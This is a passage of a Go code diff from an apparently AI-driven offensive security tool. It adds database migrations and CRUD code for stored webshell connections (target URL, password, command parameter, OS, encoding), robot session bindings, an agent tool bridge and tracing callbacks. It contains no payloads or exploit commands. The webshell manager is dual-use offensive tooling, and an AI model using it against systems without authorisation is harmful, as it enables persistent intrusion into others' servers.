// reasoning_content:DeepSeek 思考模式 + 工具调用续跑;与 last_react_input 互补,供消息表回退路径回放
|
||||
var rcColCount int
|
||||
errRC := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='reasoning_content'").Scan(&rcColCount)
|
||||
if errRC != nil {
|
||||
if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); addErr != nil {
|
||||
errMsg := strings.ToLower(addErr.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", addErr)
|
||||
}
|
||||
}
|
||||
} else if rcColCount == 0 {
|
||||
if _, err := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); err != nil {
|
||||
errMsg := strings.ToLower(err.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// migrateConversationsTable 迁移conversations表,添加新字段
|
||||
func (db *DB) migrateConversationsTable() error {
|
||||
// 检查last_react_input字段是否存在
|
||||
@@ -732,6 +938,37 @@ func (db *DB) migrateVulnerabilitiesTable() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// migrateWebshellConnectionsTable 迁移 webshell_connections 表,补充新字段
|
||||
func (db *DB) migrateWebshellConnectionsTable() error {
|
||||
columns := []struct {
|
||||
name string
|
||||
stmt string
|
||||
}{
|
||||
{name: "encoding", stmt: "ALTER TABLE webshell_connections ADD COLUMN encoding TEXT NOT NULL DEFAULT ''"},
|
||||
{name: "os", stmt: "ALTER TABLE webshell_connections ADD COLUMN os TEXT NOT NULL DEFAULT ''"},
|
||||
}
|
||||
|
||||
for _, col := range columns {
|
||||
var count int
|
||||
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('webshell_connections') WHERE name=?", col.name).Scan(&count)
|
||||
if err != nil {
|
||||
if _, addErr := db.Exec(col.stmt); addErr != nil {
|
||||
errMsg := strings.ToLower(addErr.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr))
|
||||
}
|
||||
}
|
||||
continue
|
||||
}
|
||||
if count == 0 {
|
||||
if _, addErr := db.Exec(col.stmt); addErr != nil {
|
||||
db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr))
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// NewKnowledgeDB 创建知识库数据库连接(只包含知识库相关的表)
|
||||
func NewKnowledgeDB(dbPath string, logger *zap.Logger) (*DB, error) {
|
||||
sqlDB, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1&_busy_timeout=5000&_synchronous=NORMAL")
|
||||
|
||||
@@ -0,0 +1,84 @@
|
||||
package database
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"fmt"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
// RobotSessionBinding 机器人会话绑定信息。
|
||||
type RobotSessionBinding struct {
|
||||
SessionKey string
|
||||
ConversationID string
|
||||
RoleName string
|
||||
UpdatedAt time.Time
|
||||
}
|
||||
|
||||
// GetRobotSessionBinding 按 session_key 获取机器人会话绑定。
|
||||
func (db *DB) GetRobotSessionBinding(sessionKey string) (*RobotSessionBinding, error) {
|
||||
sessionKey = strings.TrimSpace(sessionKey)
|
||||
if sessionKey == "" {
|
||||
return nil, nil
|
||||
}
|
||||
var b RobotSessionBinding
|
||||
var updatedAt string
|
||||
err := db.QueryRow(
|
||||
"SELECT session_key, conversation_id, role_name, updated_at FROM robot_user_sessions WHERE session_key = ?",
|
||||
sessionKey,
|
||||
).Scan(&b.SessionKey, &b.ConversationID, &b.RoleName, &updatedAt)
|
||||
if err != nil {
|
||||
if err == sql.ErrNoRows {
|
||||
return nil, nil
|
||||
}
|
||||
return nil, fmt.Errorf("查询机器人会话绑定失败: %w", err)
|
||||
}
|
||||
if t, e := time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt); e == nil {
|
||||
b.UpdatedAt = t
|
||||
} else if t, e := time.Parse("2006-01-02 15:04:05", updatedAt); e == nil {
|
||||
b.UpdatedAt = t
|
||||
} else {
|
||||
b.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
|
||||
}
|
||||
if strings.TrimSpace(b.RoleName) == "" {
|
||||
b.RoleName = "默认"
|
||||
}
|
||||
return &b, nil
|
||||
}
|
||||
|
||||
// UpsertRobotSessionBinding 写入或更新机器人会话绑定(包含角色)。
|
||||
func (db *DB) UpsertRobotSessionBinding(sessionKey, conversationID, roleName string) error {
|
||||
sessionKey = strings.TrimSpace(sessionKey)
|
||||
conversationID = strings.TrimSpace(conversationID)
|
||||
roleName = strings.TrimSpace(roleName)
|
||||
if sessionKey == "" || conversationID == "" {
|
||||
return nil
|
||||
}
|
||||
if roleName == "" {
|
||||
roleName = "默认"
|
||||
}
|
||||
_, err := db.Exec(`
|
||||
INSERT INTO robot_user_sessions (session_key, conversation_id, role_name, updated_at)
|
||||
VALUES (?, ?, ?, ?)
|
||||
ON CONFLICT(session_key) DO UPDATE SET
|
||||
conversation_id = excluded.conversation_id,
|
||||
role_name = excluded.role_name,
|
||||
updated_at = excluded.updated_at
|
||||
`, sessionKey, conversationID, roleName, time.Now())
|
||||
if err != nil {
|
||||
return fmt.Errorf("写入机器人会话绑定失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteRobotSessionBinding 删除机器人会话绑定。
|
||||
func (db *DB) DeleteRobotSessionBinding(sessionKey string) error {
|
||||
sessionKey = strings.TrimSpace(sessionKey)
|
||||
if sessionKey == "" {
|
||||
return nil
|
||||
}
|
||||
if _, err := db.Exec("DELETE FROM robot_user_sessions WHERE session_key = ?", sessionKey); err != nil {
|
||||
return fmt.Errorf("删除机器人会话绑定失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
@@ -16,6 +16,8 @@ type WebShellConnection struct {
|
||||
Method string `json:"method"`
|
||||
CmdParam string `json:"cmdParam"`
|
||||
Remark string `json:"remark"`
|
||||
Encoding string `json:"encoding"` // 目标响应编码:auto / utf-8 / gbk / gb18030,空值视为 auto
|
||||
OS string `json:"os"` // 目标操作系统:auto / linux / windows,空值/未知视为 auto
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
}
|
||||
|
||||
@@ -58,7 +60,8 @@ func (db *DB) UpsertWebshellConnectionState(connectionID, stateJSON string) erro
|
||||
// ListWebshellConnections 列出所有 WebShell 连接,按创建时间倒序
|
||||
func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
|
||||
query := `
|
||||
SELECT id, url, password, type, method, cmd_param, remark, created_at
|
||||
SELECT id, url, password, type, method, cmd_param, remark,
|
||||
COALESCE(encoding, '') AS encoding, COALESCE(os, '') AS os, created_at
|
||||
FROM webshell_connections
|
||||
ORDER BY created_at DESC
|
||||
`
|
||||
@@ -72,7 +75,7 @@ func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
|
||||
var list []WebShellConnection
|
||||
for rows.Next() {
|
||||
var c WebShellConnection
|
||||
err := rows.Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.CreatedAt)
|
||||
err := rows.Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.Encoding, &c.OS, &c.CreatedAt)
|
||||
if err != nil {
|
||||
db.logger.Warn("扫描 WebShell 连接行失败", zap.Error(err))
|
||||
continue
|
||||
@@ -85,11 +88,12 @@ func (db *DB) ListWebshellConnections() ([]WebShellConnection, error) {
|
||||
// GetWebshellConnection 根据 ID 获取一条连接
|
||||
func (db *DB) GetWebshellConnection(id string) (*WebShellConnection, error) {
|
||||
query := `
|
||||
SELECT id, url, password, type, method, cmd_param, remark, created_at
|
||||
SELECT id, url, password, type, method, cmd_param, remark,
|
||||
COALESCE(encoding, '') AS encoding, COALESCE(os, '') AS os, created_at
|
||||
FROM webshell_connections WHERE id = ?
|
||||
`
|
||||
var c WebShellConnection
|
||||
err := db.QueryRow(query, id).Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.CreatedAt)
|
||||
err := db.QueryRow(query, id).Scan(&c.ID, &c.URL, &c.Password, &c.Type, &c.Method, &c.CmdParam, &c.Remark, &c.Encoding, &c.OS, &c.CreatedAt)
|
||||
if err == sql.ErrNoRows {
|
||||
return nil, nil
|
||||
}
|
||||
@@ -103,10 +107,10 @@ func (db *DB) GetWebshellConnection(id string) (*WebShellConnection, error) {
|
||||
// CreateWebshellConnection 创建 WebShell 连接
|
||||
func (db *DB) CreateWebshellConnection(c *WebShellConnection) error {
|
||||
query := `
|
||||
INSERT INTO webshell_connections (id, url, password, type, method, cmd_param, remark, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, ?)
|
||||
INSERT INTO webshell_connections (id, url, password, type, method, cmd_param, remark, encoding, os, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
|
||||
`
|
||||
_, err := db.Exec(query, c.ID, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.CreatedAt)
|
||||
_, err := db.Exec(query, c.ID, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.Encoding, c.OS, c.CreatedAt)
|
||||
if err != nil {
|
||||
db.logger.Error("创建 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID))
|
||||
return err
|
||||
@@ -118,10 +122,10 @@ func (db *DB) CreateWebshellConnection(c *WebShellConnection) error {
|
||||
func (db *DB) UpdateWebshellConnection(c *WebShellConnection) error {
|
||||
query := `
|
||||
UPDATE webshell_connections
|
||||
SET url = ?, password = ?, type = ?, method = ?, cmd_param = ?, remark = ?
|
||||
SET url = ?, password = ?, type = ?, method = ?, cmd_param = ?, remark = ?, encoding = ?, os = ?
|
||||
WHERE id = ?
|
||||
`
|
||||
result, err := db.Exec(query, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.ID)
|
||||
result, err := db.Exec(query, c.URL, c.Password, c.Type, c.Method, c.CmdParam, c.Remark, c.Encoding, c.OS, c.ID)
|
||||
if err != nil {
|
||||
db.logger.Error("更新 WebShell 连接失败", zap.Error(err), zap.String("id", c.ID))
|
||||
return err
|
||||
|
||||
@@ -23,12 +23,16 @@ type ExecutionRecorder func(executionID string)
|
||||
const ToolErrorPrefix = "__CYBERSTRIKE_AI_TOOL_ERROR__\n"
|
||||
|
||||
// ToolsFromDefinitions 将单 Agent 使用的 OpenAI 风格工具定义转为 Eino InvokableTool,执行时走 Agent 的 MCP 路径。
|
||||
// invokeNotify 可选:与 runEinoADKAgentLoop 共享,在 InvokableRun 返回时触发 UI 与 pending 清理(与 ADK Tool 事件去重)。
|
||||
// einoAgentName 为该套工具所属 ChatModelAgent 的 Name(主代理或子代理 id),用于 SSE 上的 einoAgent 字段。
|
||||
func ToolsFromDefinitions(
|
||||
ag *agent.Agent,
|
||||
holder *ConversationHolder,
|
||||
defs []agent.Tool,
|
||||
rec ExecutionRecorder,
|
||||
toolOutputChunk func(toolName, toolCallID, chunk string),
|
||||
invokeNotify *ToolInvokeNotifyHolder,
|
||||
einoAgentName string,
|
||||
) ([]tool.BaseTool, error) {
|
||||
out := make([]tool.BaseTool, 0, len(defs))
|
||||
for _, d := range defs {
|
||||
@@ -40,12 +44,14 @@ func ToolsFromDefinitions(
|
||||
return nil, fmt.Errorf("tool %q: %w", d.Function.Name, err)
|
||||
}
|
||||
out = append(out, &mcpBridgeTool{
|
||||
info: info,
|
||||
name: d.Function.Name,
|
||||
agent: ag,
|
||||
holder: holder,
|
||||
record: rec,
|
||||
chunk: toolOutputChunk,
|
||||
info: info,
|
||||
name: d.Function.Name,
|
||||
agent: ag,
|
||||
holder: holder,
|
||||
record: rec,
|
||||
chunk: toolOutputChunk,
|
||||
invokeNotify: invokeNotify,
|
||||
einoAgentName: strings.TrimSpace(einoAgentName),
|
||||
})
|
||||
}
|
||||
return out, nil
|
||||
@@ -77,12 +83,14 @@ func toolInfoFromDefinition(d agent.Tool) (*schema.ToolInfo, error) {
|
||||
}
|
||||
|
||||
type mcpBridgeTool struct {
|
||||
info *schema.ToolInfo
|
||||
name string
|
||||
agent *agent.Agent
|
||||
holder *ConversationHolder
|
||||
record ExecutionRecorder
|
||||
chunk func(toolName, toolCallID, chunk string)
|
||||
info *schema.ToolInfo
|
||||
name string
|
||||
agent *agent.Agent
|
||||
holder *ConversationHolder
|
||||
record ExecutionRecorder
|
||||
chunk func(toolName, toolCallID, chunk string)
|
||||
invokeNotify *ToolInvokeNotifyHolder
|
||||
einoAgentName string
|
||||
}
|
||||
|
||||
func (m *mcpBridgeTool) Info(ctx context.Context) (*schema.ToolInfo, error) {
|
||||
@@ -90,8 +98,27 @@ func (m *mcpBridgeTool) Info(ctx context.Context) (*schema.ToolInfo, error) {
|
||||
return m.info, nil
|
||||
}
|
||||
|
||||
func (m *mcpBridgeTool) InvokableRun(ctx context.Context, argumentsInJSON string, opts ...tool.Option) (string, error) {
|
||||
func (m *mcpBridgeTool) InvokableRun(ctx context.Context, argumentsInJSON string, opts ...tool.Option) (out string, err error) {
|
||||
_ = opts
|
||||
toolCallID := compose.GetToolCallID(ctx)
|
||||
defer func() {
|
||||
if m.invokeNotify == nil {
|
||||
return
|
||||
}
|
||||
tid := strings.TrimSpace(toolCallID)
|
||||
if tid == "" {
|
||||
return
|
||||
}
|
||||
success := err == nil && !strings.HasPrefix(out, ToolErrorPrefix)
|
||||
body := out
|
||||
if err != nil {
|
||||
success = false
|
||||
} else if strings.HasPrefix(out, ToolErrorPrefix) {
|
||||
success = false
|
||||
body = strings.TrimPrefix(out, ToolErrorPrefix)
|
||||
}
|
||||
m.invokeNotify.Fire(tid, m.name, m.einoAgentName, success, body, err)
|
||||
}()
|
||||
return runMCPToolInvocation(ctx, m.agent, m.holder, m.name, argumentsInJSON, m.record, m.chunk)
|
||||
}
|
||||
|
||||
|
||||
@@ -0,0 +1,39 @@
|
||||
package einomcp
|
||||
|
||||
import "sync"
|
||||
|
||||
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP 桥在每次 InvokableRun 结束时 Fire,
|
||||
// 用于在 ADK 未透出 schema.Tool 事件时仍推送 tool_result、清 pending,避免 UI 卡在「执行中」或迭代末 force-close。
|
||||
type ToolInvokeNotifyHolder struct {
|
||||
mu sync.RWMutex
|
||||
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
|
||||
}
|
||||
|
||||
// NewToolInvokeNotifyHolder 创建可在 ToolsFromDefinitions 与 run loop 之间共享的 holder。
|
||||
func NewToolInvokeNotifyHolder() *ToolInvokeNotifyHolder {
|
||||
return &ToolInvokeNotifyHolder{}
|
||||
}
|
||||
|
||||
// Set 由 runEinoADKAgentLoop 在开始消费 iter 之前调用;可多次覆盖(通常仅一次)。
|
||||
func (h *ToolInvokeNotifyHolder) Set(fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)) {
|
||||
if h == nil {
|
||||
return
|
||||
}
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
h.fn = fn
|
||||
}
|
||||
|
||||
// Fire 由 mcpBridgeTool 在工具调用返回时调用;若尚未 Set 或 toolCallID 为空则忽略。
|
||||
func (h *ToolInvokeNotifyHolder) Fire(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
|
||||
if h == nil {
|
||||
return
|
||||
}
|
||||
h.mu.RLock()
|
||||
fn := h.fn
|
||||
h.mu.RUnlock()
|
||||
if fn == nil {
|
||||
return
|
||||
}
|
||||
fn(toolCallID, toolName, einoAgent, success, content, invokeErr)
|
||||
}
|
||||
@@ -0,0 +1,435 @@
|
||||
// Package einoobserve attaches CloudWeGo Eino [callbacks.Handler] to ADK Runner contexts for
|
||||
// structured logging and optional SSE trace events (eino_trace_*).
|
||||
package einoobserve
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/callbacks"
|
||||
"github.com/cloudwego/eino/components"
|
||||
"github.com/cloudwego/eino/components/model"
|
||||
"github.com/cloudwego/eino/components/tool"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"github.com/google/uuid"
|
||||
"go.opentelemetry.io/otel"
|
||||
"go.opentelemetry.io/otel/attribute"
|
||||
"go.opentelemetry.io/otel/codes"
|
||||
"go.opentelemetry.io/otel/trace"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
type ctxSpanKey struct{}
|
||||
|
||||
type ctxOtelSpanKey struct{}
|
||||
|
||||
// Params for attaching per-run callback instrumentation.
|
||||
type Params struct {
|
||||
Logger *zap.Logger
|
||||
Progress func(eventType, message string, data interface{})
|
||||
ConversationID string
|
||||
OrchMode string
|
||||
OrchestratorName string
|
||||
}
|
||||
|
||||
// AttachAgentRunCallbacks returns ctx wrapped with callbacks.InitCallbacks when enabled.
|
||||
// Safe to call with nil cfg or disabled cfg (returns ctx unchanged).
|
||||
func AttachAgentRunCallbacks(ctx context.Context, cfg *config.MultiAgentEinoCallbacksConfig, p Params) context.Context {
|
||||
if ctx == nil {
|
||||
return ctx
|
||||
}
|
||||
if cfg == nil || !cfg.Enabled {
|
||||
return ctx
|
||||
}
|
||||
mode := cfg.EinoCallbacksModeEffective()
|
||||
if mode == "off" {
|
||||
return ctx
|
||||
}
|
||||
runID := uuid.New().String()
|
||||
if p.Progress != nil && cfg.ShouldEmitEinoTraceSSE(mode) {
|
||||
p.Progress("eino_trace_run", "Eino callbacks session", map[string]interface{}{
|
||||
"runId": runID,
|
||||
"conversationId": strings.TrimSpace(p.ConversationID),
|
||||
"orchestration": strings.TrimSpace(p.OrchMode),
|
||||
"orchestratorName": strings.TrimSpace(p.OrchestratorName),
|
||||
"observeMode": mode,
|
||||
"source": "eino_callbacks",
|
||||
})
|
||||
}
|
||||
h := &runHandler{
|
||||
cfg: *cfg,
|
||||
mode: mode,
|
||||
params: p,
|
||||
runID: runID,
|
||||
}
|
||||
b := callbacks.NewHandlerBuilder().
|
||||
OnStartFn(h.onStart).
|
||||
OnEndFn(h.onEnd).
|
||||
OnErrorFn(h.onError)
|
||||
if mode == "full" {
|
||||
b = b.OnStartWithStreamInputFn(h.onStartStreamIn).OnEndWithStreamOutputFn(h.onEndStreamOut)
|
||||
}
|
||||
ri := &callbacks.RunInfo{
|
||||
Name: "CyberStrikeADKRun",
|
||||
Type: strings.TrimSpace(p.OrchMode),
|
||||
Component: components.Component("AgentSession"),
|
||||
}
|
||||
return callbacks.InitCallbacks(ctx, ri, b.Build())
|
||||
}
|
||||
|
||||
type runHandler struct {
|
||||
cfg config.MultiAgentEinoCallbacksConfig
|
||||
mode string
|
||||
params Params
|
||||
runID string
|
||||
|
||||
mu sync.Mutex
|
||||
spanStack []string
|
||||
seq atomic.Uint64
|
||||
}
|
||||
|
||||
func (h *runHandler) genSpanID() string {
|
||||
return fmt.Sprintf("%s-%d", h.runID, h.seq.Add(1))
|
||||
}
|
||||
|
||||
func (h *runHandler) popSpan() (id string) {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
if len(h.spanStack) == 0 {
|
||||
return ""
|
||||
}
|
||||
id = h.spanStack[len(h.spanStack)-1]
|
||||
h.spanStack = h.spanStack[:len(h.spanStack)-1]
|
||||
return id
|
||||
}
|
||||
|
||||
// popMatching removes the given id from the stack top if it matches; otherwise pops until empty or match (rare ordering mismatch).
|
||||
func (h *runHandler) popMatching(want string) string {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
if want == "" {
|
||||
if len(h.spanStack) == 0 {
|
||||
return ""
|
||||
}
|
||||
id := h.spanStack[len(h.spanStack)-1]
|
||||
h.spanStack = h.spanStack[:len(h.spanStack)-1]
|
||||
return id
|
||||
}
|
||||
for len(h.spanStack) > 0 {
|
||||
top := h.spanStack[len(h.spanStack)-1]
|
||||
h.spanStack = h.spanStack[:len(h.spanStack)-1]
|
||||
if top == want {
|
||||
return top
|
||||
}
|
||||
}
|
||||
return want
|
||||
}
|
||||
|
||||
func (h *runHandler) onStart(ctx context.Context, info *callbacks.RunInfo, input callbacks.CallbackInput) context.Context {
|
||||
var parentID string
|
||||
h.mu.Lock()
|
||||
if len(h.spanStack) > 0 {
|
||||
parentID = h.spanStack[len(h.spanStack)-1]
|
||||
}
|
||||
spanID := h.genSpanID()
|
||||
h.spanStack = append(h.spanStack, spanID)
|
||||
h.mu.Unlock()
|
||||
|
||||
inSum := summarizeCallbackInput(input, h.cfg.EinoCallbacksMaxInputSummaryRunes())
|
||||
if h.cfg.OtelTracingActive() {
|
||||
tracer := otel.Tracer("cyberstrike/eino")
|
||||
spanName := callbackSpanName(info)
|
||||
var sp trace.Span
|
||||
ctx, sp = tracer.Start(ctx, spanName,
|
||||
trace.WithSpanKind(trace.SpanKindInternal),
|
||||
trace.WithAttributes(
|
||||
attribute.String("eino.component", string(info.Component)),
|
||||
attribute.String("eino.name", info.Name),
|
||||
attribute.String("eino.type", info.Type),
|
||||
attribute.String("cyberstrike.run_id", h.runID),
|
||||
attribute.String("cyberstrike.conversation_id", strings.TrimSpace(h.params.ConversationID)),
|
||||
attribute.String("cyberstrike.orchestration", strings.TrimSpace(h.params.OrchMode)),
|
||||
),
|
||||
)
|
||||
if inSum != "" {
|
||||
sp.SetAttributes(attribute.String("eino.input.summary", truncateForAttr(inSum, 256)))
|
||||
}
|
||||
ctx = context.WithValue(ctx, ctxOtelSpanKey{}, sp)
|
||||
}
|
||||
if h.params.Logger != nil {
|
||||
fields := []zap.Field{
|
||||
zap.String("runId", h.runID),
|
||||
zap.String("spanId", spanID),
|
||||
zap.String("parentSpanId", parentID),
|
||||
zap.String("component", string(info.Component)),
|
||||
zap.String("name", info.Name),
|
||||
zap.String("type", info.Type),
|
||||
zap.String("phase", "start"),
|
||||
}
|
||||
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
|
||||
if sc := sp.SpanContext(); sc.IsValid() {
|
||||
fields = append(fields,
|
||||
zap.String("trace_id", sc.TraceID().String()),
|
||||
zap.String("otel_span_id", sc.SpanID().String()),
|
||||
)
|
||||
}
|
||||
}
|
||||
if h.cfg.ZapVerbose {
|
||||
h.params.Logger.Debug("eino_callback", append(fields, zap.String("inputSummary", inSum))...)
|
||||
} else {
|
||||
h.params.Logger.Info("eino_callback", fields...)
|
||||
}
|
||||
}
|
||||
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
|
||||
h.params.Progress("eino_trace_start", "", map[string]interface{}{
|
||||
"runId": h.runID,
|
||||
"spanId": spanID,
|
||||
"parentSpanId": parentID,
|
||||
"conversationId": strings.TrimSpace(h.params.ConversationID),
|
||||
"orchestration": strings.TrimSpace(h.params.OrchMode),
|
||||
"component": string(info.Component),
|
||||
"name": info.Name,
|
||||
"type": info.Type,
|
||||
"ts": time.Now().UTC().Format(time.RFC3339Nano),
|
||||
"inputSummary": inSum,
|
||||
"source": "eino_callbacks",
|
||||
})
|
||||
}
|
||||
ctx = context.WithValue(ctx, ctxSpanKey{}, spanID)
|
||||
return ctx
|
||||
}
|
||||
|
||||
func (h *runHandler) onEnd(ctx context.Context, info *callbacks.RunInfo, output callbacks.CallbackOutput) context.Context {
|
||||
spanID, _ := ctx.Value(ctxSpanKey{}).(string)
|
||||
if spanID == "" {
|
||||
spanID = h.popSpan()
|
||||
} else {
|
||||
spanID = h.popMatching(spanID)
|
||||
}
|
||||
outSum := summarizeCallbackOutput(output, h.cfg.EinoCallbacksMaxOutputSummaryRunes())
|
||||
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
|
||||
if outSum != "" {
|
||||
sp.SetAttributes(attribute.String("eino.output.summary", truncateForAttr(outSum, 256)))
|
||||
}
|
||||
sp.SetStatus(codes.Ok, "")
|
||||
sp.End()
|
||||
}
|
||||
if h.params.Logger != nil {
|
||||
fields := []zap.Field{
|
||||
zap.String("runId", h.runID),
|
||||
zap.String("spanId", spanID),
|
||||
zap.String("component", string(info.Component)),
|
||||
zap.String("name", info.Name),
|
||||
zap.String("type", info.Type),
|
||||
zap.String("phase", "end"),
|
||||
}
|
||||
if h.cfg.ZapVerbose {
|
||||
h.params.Logger.Debug("eino_callback", append(fields, zap.String("outputSummary", outSum))...)
|
||||
} else {
|
||||
h.params.Logger.Info("eino_callback", fields...)
|
||||
}
|
||||
}
|
||||
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
|
||||
h.params.Progress("eino_trace_end", "", map[string]interface{}{
|
||||
"runId": h.runID,
|
||||
"spanId": spanID,
|
||||
"conversationId": strings.TrimSpace(h.params.ConversationID),
|
||||
"orchestration": strings.TrimSpace(h.params.OrchMode),
|
||||
"component": string(info.Component),
|
||||
"name": info.Name,
|
||||
"type": info.Type,
|
||||
"ts": time.Now().UTC().Format(time.RFC3339Nano),
|
||||
"outputSummary": outSum,
|
||||
"source": "eino_callbacks",
|
||||
})
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
|
||||
func (h *runHandler) onError(ctx context.Context, info *callbacks.RunInfo, err error) context.Context {
|
||||
spanID, _ := ctx.Value(ctxSpanKey{}).(string)
|
||||
if spanID == "" {
|
||||
spanID = h.popSpan()
|
||||
} else {
|
||||
spanID = h.popMatching(spanID)
|
||||
}
|
||||
msg := ""
|
||||
if err != nil {
|
||||
msg = truncateRunes(err.Error(), h.cfg.EinoCallbacksMaxOutputSummaryRunes())
|
||||
}
|
||||
if sp, ok := ctx.Value(ctxOtelSpanKey{}).(trace.Span); ok && sp != nil {
|
||||
if err != nil {
|
||||
sp.RecordError(err)
|
||||
}
|
||||
sp.SetStatus(codes.Error, msg)
|
||||
sp.End()
|
||||
}
|
||||
if h.params.Logger != nil {
|
||||
h.params.Logger.Warn("eino_callback_error",
|
||||
zap.String("runId", h.runID),
|
||||
zap.String("spanId", spanID),
|
||||
zap.String("component", string(info.Component)),
|
||||
zap.String("name", info.Name),
|
||||
zap.String("type", info.Type),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
if h.params.Progress != nil && h.cfg.ShouldEmitEinoTraceSSE(h.mode) {
|
||||
h.params.Progress("eino_trace_error", msg, map[string]interface{}{
|
||||
"runId": h.runID,
|
||||
"spanId": spanID,
|
||||
"conversationId": strings.TrimSpace(h.params.ConversationID),
|
||||
"orchestration": strings.TrimSpace(h.params.OrchMode),
|
||||
"component": string(info.Component),
|
||||
"name": info.Name,
|
||||
"type": info.Type,
|
||||
"ts": time.Now().UTC().Format(time.RFC3339Nano),
|
||||
"error": msg,
|
||||
"source": "eino_callbacks",
|
||||
})
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
|
||||
func (h *runHandler) onStartStreamIn(ctx context.Context, info *callbacks.RunInfo, input *schema.StreamReader[callbacks.CallbackInput]) context.Context {
|
||||
if input != nil {
|
||||
input.Close()
|
||||
}
|
||||
if h.params.Logger != nil {
|
||||
h.params.Logger.Debug("eino_callback_stream_in",
|
||||
zap.String("runId", h.runID),
|
||||
zap.String("component", string(info.Component)),
|
||||
zap.String("name", info.Name),
|
||||
)
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
|
||||
func (h *runHandler) onEndStreamOut(ctx context.Context, info *callbacks.RunInfo, output *schema.StreamReader[callbacks.CallbackOutput]) context.Context {
|
||||
if output != nil {
|
||||
output.Close()
|
||||
}
|
||||
if h.params.Logger != nil {
|
||||
h.params.Logger.Debug("eino_callback_stream_out",
|
||||
zap.String("runId", h.runID),
|
||||
zap.String("component", string(info.Component)),
|
||||
zap.String("name", info.Name),
|
||||
)
|
||||
}
|
||||
return ctx
|
||||
}
|
||||
|
||||
func callbackSpanName(info *callbacks.RunInfo) string {
|
||||
if info == nil {
|
||||
return "eino.callback"
|
||||
}
|
||||
comp := strings.TrimSpace(string(info.Component))
|
||||
name := strings.TrimSpace(info.Name)
|
||||
typ := strings.TrimSpace(info.Type)
|
||||
if name != "" && comp != "" {
|
||||
return comp + "/" + name
|
||||
}
|
||||
if typ != "" && comp != "" {
|
||||
return comp + "[" + typ + "]"
|
||||
}
|
||||
if comp != "" {
|
||||
return comp
|
||||
}
|
||||
return "eino.callback"
|
||||
}
|
||||
|
||||
func truncateForAttr(s string, maxRunes int) string {
|
||||
return truncateRunes(s, maxRunes)
|
||||
}
|
||||
|
||||
func summarizeCallbackInput(in callbacks.CallbackInput, maxRunes int) string {
|
||||
if in == nil {
|
||||
return ""
|
||||
}
|
||||
if ai := adk.ConvAgentCallbackInput(in); ai != nil {
|
||||
parts := []string{"agent"}
|
||||
if ai.Input != nil {
|
||||
parts = append(parts, fmt.Sprintf("messages=%d", len(ai.Input.Messages)))
|
||||
}
|
||||
if ai.ResumeInfo != nil {
|
||||
parts = append(parts, "resume=true")
|
||||
}
|
||||
return strings.Join(parts, " ")
|
||||
}
|
||||
if mi := model.ConvCallbackInput(in); mi != nil {
|
||||
return fmt.Sprintf("chatModel messages=%d tools=%d", len(mi.Messages), len(mi.Tools))
|
